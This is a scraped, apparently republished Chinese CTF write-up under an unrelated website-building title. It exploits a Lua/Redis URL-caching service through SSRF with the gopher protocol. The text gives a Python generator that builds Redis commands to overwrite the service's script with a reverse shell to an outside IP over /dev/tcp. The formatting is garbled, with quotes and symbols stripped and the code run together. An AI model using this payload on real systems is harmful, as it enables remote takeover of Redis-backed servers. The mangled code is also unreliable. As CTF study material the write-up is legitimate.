当前位置：首页 > news >正文

网站超级链接怎么做联谊会建设网站

news 2026/4/9 4:01:18

网站超级链接怎么做,联谊会建设网站,专门做音乐的网站,连云港网站关键词优化服务明天开始考试周#xff0c;百无聊赖开了一把CTF#xff0c;还顺带体验了下二开工具#xff0c;让无聊的Z3很开心#x1f642; CachedVisitor这题大概描述一下#xff1a;从main.lua加载一段visit.script中被##LUA_START##(.-)##LUA_END##包裹的lua代码 main.lua loca…明天开始考试周百无聊赖开了一把CTF还顺带体验了下二开工具让无聊的Z3很开心 CachedVisitor这题大概描述一下从main.lua加载一段visit.script中被##LUA_START##(.-)##LUA_END##包裹的lua代码 main.lua local function read_file(filename)local file io.open(filename, r)if not file thenprint(Error: Could not open file .. filename)return nilendlocal content file:read(*a)file:close()return content endlocal function execute_lua_code(script_content)local lua_code script_content:match(##LUA_START##(.-)##LUA_END##)if lua_code thenlocal chunk, err load(lua_code)if chunk thenlocal success, result pcall(chunk)if not success thenprint(Error executing Lua code: , result)endelseprint(Error loading Lua code: , err)endelseprint(Error: No valid Lua code block found.)end endlocal function main()local filename /scripts/visit.scriptlocal script_content read_file(filename)if script_content thenexecute_lua_code(script_content)end endmain() visit.script ##LUA_START## local curl require(cURL) local redis require(resty.redis)ngx.req.read_body() local args ngx.req.get_uri_args() local url args.urlif not url thenngx.say(URL parameter is missing!)return endlocal red redis:new() red:set_timeout(1000)local ok, err red:connect(127.0.0.1, 6379) if not ok thenngx.say(Failed to connect to Redis: , err)return endlocal res, err red:get(url) if res and res ~ ngx.null thenngx.say(res)return endlocal c curl.easy {url url,timeout 5,connecttimeout 5 }local response_body {}c:setopt_writefunction(table.insert, response_body)local ok, err pcall(c.perform, c)if not ok thenngx.say(Failed to perform request: , err)c:close()return endc:close()local response_str table.concat(response_body)local ok, err red:setex(url, 3600, response_str) if not ok thenngx.say(Failed to save response in Redis: , err)return endngx.say(response_str) ##LUA_END## 题目预设的visit.script是与内网的redis通信可以打用gopher协议打redis任意文件写但题目没有计划任务考虑直接覆写/scripts/visit.script 因为有##LUA_START##(.-)##LUA_END##包裹所以不会被脏数据影响直接用redis-over-gopher一直打不通 sec_tools/redis-over-gopher at master · firebroo/sec_tools · GitHub Gopherus有一段类似的逻辑它的反弹shell是通过覆盖计划任务文件来实现于是这里通过修改gopherus的/scripts/Redis.py来生成payload import urllibdef Redis():def get_Redis_OverWrite():target_dir raw_input(input target dir: ) or /scriptsip raw_input(input rev ip: ) or 27.25.151.98port raw_input(input rev port: ) or 1337file raw_input(input target filename: ) or visit.scriptfile_len len(file)cmd ##LUA_START##os.execute(bash -c sh -i /dev/tcp/{}/{} 01)##LUA_END##.format(ip, port)len_cmd len(cmd) 5payload *1\r $8\r flushall\r *3\r $3\r set\r $1\r 1\r ${}\r{}\r *4\r $6\r config\r $3\r set\r $3\r dir\r ${}\r {}\r *4\r $6\r config\r $3\r set\r $10\r dbfilename\r ${}\r {}\r *1\r $4\r save\r.format(len_cmd, cmd, len(target_dir), target_dir, file_len, file)finalpayload urllib.quote_plus(payload).replace(, %20).replace(%2F, /).replace(%25, %).replace(%3A, :)print(\033[93m \nYour gopher link is ready to overwrite file: \n \033[0m)print(\033[04m gopher://127.0.0.1:6379/_ finalpayload \033[0m)print(\n \033[41m -----------Made-by-Z3r4y----------- \033[0m)get_Redis_OverWrite()直接打入成功反弹shell

查看全文

http://www.w-s-a.com/news/686473/